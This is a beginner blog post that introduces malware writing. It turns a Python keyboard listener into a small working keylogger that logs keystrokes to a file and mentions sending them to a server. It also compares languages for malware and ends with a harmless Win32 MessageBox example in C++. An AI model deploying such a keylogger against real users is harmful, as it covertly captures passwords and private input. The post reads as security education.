Aly Khaled

Aly Khaled

Cybersecurity Researcher @ Resecurity, Jr Penetration Tester, .NET Core Backend Developer, Computers and Automatic Control Graduate

Intro to how to make a malware

3 minute read

Hi guys

Well, I have decided to build malware, so let’s make it together.

What is malware?

Just a piece of code. let’s have an example In the gaming world, how could a game detect which key you have pressed?. Let’s see this piece of code. Don’t panic. we will use python for simplicity but don’t expect that all time :)

from pynput import keyboard
def on_press_func(key):
	
	\\do something for the game
	
listener = keyboard.Listener(on_press=on_press_func)
listener.start()

So how can that be malware? Yes, that is KeyLogger. What does a KeyLogger do?. Just save what you press on the keyboard then, it sends it or whatever it does. Let’s see how a KeyLogger looks like.

from pynput import keyboard
def on_press_func(key):
	with open('keylogs.txt', 'a') as logs:
		logs.write(str(key))
	
listener = keyboard.Listener(on_press=on_press_func)
listener.start()

We can then send this file to our server or wherever. So we are here just making a program which can do whatever we went it to do.

Now, what do we need to know before we launch our coding process?

  1. What kind of malware is it (Trojan, worm, virus,.etc)
  2. Which protocol it will use (TCP, UDP, HTTP, HTTPS)
  3. What program language you want to use
language detection size performance
Python/Ruby Easy Large Slow
Golang Medium Large Medium
C/C++ Hard Small Fast

So you are free for what you want to use. For me, I’m going to use C++ as a language. So, all we need is a c++ compiler and a VM to play with it.

Let’s start with simple MsgBox. But first, we have to know some basics. What is Win32APIs? Alternatively referred to as the Windows API and WinAPI, Win32 is the main set of Microsoft Windows APIs used for developing 32-bit applications. These APIs are responsible for functions in the following categories:

  • Administration and Management - Install, configure, and service applications or systems.
  • Diagnostics - Troubleshoot application, system problems, and monitor performance.
  • Graphics and Multimedia - Incorporate formatted text, graphics, audio, and video.
  • Networking - Communicate between applications on different computers on a network.
  • Security - Password authentication, discretionary protection for all sharable system objects, privileged access control, rights management, and security auditing.
  • System Services - Gives access to computer resources and the underlying operating system, such as memory, file system, devices, processes, and threads.
  • Windows User Interface - Create and manage a user interface, such as display output, prompt for user input, and support for user interaction.

So generally, you can control anything with those APIs. But how? let’s try. You can find whatever you need in Microsoft docs like MessageBox function

Syntax

int MessageBoxA(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType
);

So it’s a function with returned value of int type indicates which button the user clicked. Our first task is making a program to show Message Box with “Hello From Nakerah” as a text with any title you want.

#include <windows.h>
int APIENTRY WinMain( HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow )
{
	MessageBoxA( NULL, "Hello From Nakerah", "Nakerah NG", MB_OK );
	return 0;
}

Let’s analyze this simple piece of code. Well, It just includes windows.h then the mai.. what?. Where is the main function?. Don’t panic. Every Windows program includes an entry-point function that is named either WinMain or wWinMain you can find more here now the second line, the MessageBoxA function takes four parameters:

  • ‘hWnd’: which means the message box has no owner window. I have set it to NULL.
  • ‘lpszText’: the string we wanna Msgbox to include.
  • ‘lpszTitle’: which is the title of the box.
  • ‘uType’: which is buttons od Msgbox.

Let’s compile. I used DEV as a compiler. <\br> The steps are simple:

  • Create a new document (project), copy then paste the above code.
  • Execute then compile
  • Save it wherever you want. You will find two files, one with exe extension and another with cpp extension. Double click the exe file and

That’s enough for today. See you :)